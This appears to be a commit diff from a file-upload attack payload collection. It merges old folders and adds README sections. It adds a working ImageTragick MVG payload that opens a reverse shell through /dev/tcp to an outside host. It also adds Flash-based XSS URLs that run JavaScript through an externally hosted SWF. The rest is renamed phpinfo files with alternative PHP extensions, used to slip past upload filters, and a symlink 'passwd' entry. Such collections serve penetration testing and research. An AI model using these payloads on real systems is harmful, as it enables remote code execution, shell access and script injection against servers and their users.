File upload - merging old files
20
Upload insecure files/Image Tragik 2/README.md → Upload insecure files/CVE Image Tragik/README.md
@ -1,6 +1,22 @@
|
|||||||
# Image Tragik 2
|
# Image Tragik 1 & 2
|
||||||
|
|
||||||
## Exploit
|
|
||||||
|
## Exploit v1
|
||||||
|
|
||||||
|
Simple reverse shell
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
push graphic-context
|
||||||
|
encoding "UTF-8"
|
||||||
|
viewbox 0 0 1 1
|
||||||
|
affine 1 0 0 1 0 0
|
||||||
|
push graphic-context
|
||||||
|
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
|
||||||
|
pop graphic-context
|
||||||
|
pop graphic-context
|
||||||
|
```
|
||||||
|
|
||||||
|
## Exploit v2
|
||||||
|
|
||||||
Simple `id` payload
|
Simple `id` payload
|
||||||
|
|
Before Width: | Height: | Size: 424 B After Width: | Height: | Size: 424 B |
Before Width: | Height: | Size: 992 B After Width: | Height: | Size: 992 B |
0
Upload insecure files/ZIP Symbolic Link/passwd → Upload insecure files/CVE ZIP Symbolic Link/passwd
12
Upload insecure files/Extension Flash/README.md
Normal file
@ -0,0 +1,12 @@
|
|||||||
|
### XSS via SWF
|
||||||
|
|
||||||
|
As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
|
||||||
|
This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
|
||||||
|
|
||||||
|
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
|
||||||
|
|
||||||
|
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
|
||||||
|
```
|
0
Upload insecure files/PHP Extension/phpinfo.phar → Upload insecure files/Extension PHP/phpinfo.phar
0
Upload insecure files/PHP Extension/phpinfo.php3 → Upload insecure files/Extension PHP/phpinfo.php3
0
Upload insecure files/PHP Extension/phpinfo.php4 → Upload insecure files/Extension PHP/phpinfo.php4
0
Upload insecure files/PHP Extension/phpinfo.php5 → Upload insecure files/Extension PHP/phpinfo.php5
0
Upload insecure files/PHP Extension/phpinfo.php7 → Upload insecure files/Extension PHP/phpinfo.php7
0
Upload insecure files/PHP Extension/phpinfo.phpt → Upload insecure files/Extension PHP/phpinfo.phpt
Before Width: | Height: | Size: 407 B After Width: | Height: | Size: 407 B |
Before Width: | Height: | Size: 1.3 KiB |
Before Width: | Height: | Size: 1.1 KiB |
Before Width: | Height: | Size: 1.1 KiB |
Before Width: | Height: | Size: 1.1 KiB |
Before Width: | Height: | Size: 1.1 KiB |
Before Width: | Height: | Size: 1.1 KiB |
Before Width: | Height: | Size: 1.1 KiB |
Before Width: | Height: | Size: 1.1 KiB |
Before Width: | Height: | Size: 1.1 KiB |
Before Width: | Height: | Size: 1.1 KiB |
Before Width: | Height: | Size: 1.2 KiB |
Before Width: | Height: | Size: 1.2 KiB |
Before Width: | Height: | Size: 1.2 KiB |
Before Width: | Height: | Size: 1.2 KiB |
Before Width: | Height: | Size: 1.2 KiB |
Before Width: | Height: | Size: 1.2 KiB |
Before Width: | Height: | Size: 1.2 KiB |
Before Width: | Height: | Size: 1.2 KiB |
Before Width: | Height: | Size: 1.2 KiB |
Before Width: | Height: | Size: 1.2 KiB |
Before Width: | Height: | Size: 1.2 KiB |
Before Width: | Height: | Size: 1.3 KiB |
Before Width: | Height: | Size: 1.3 KiB |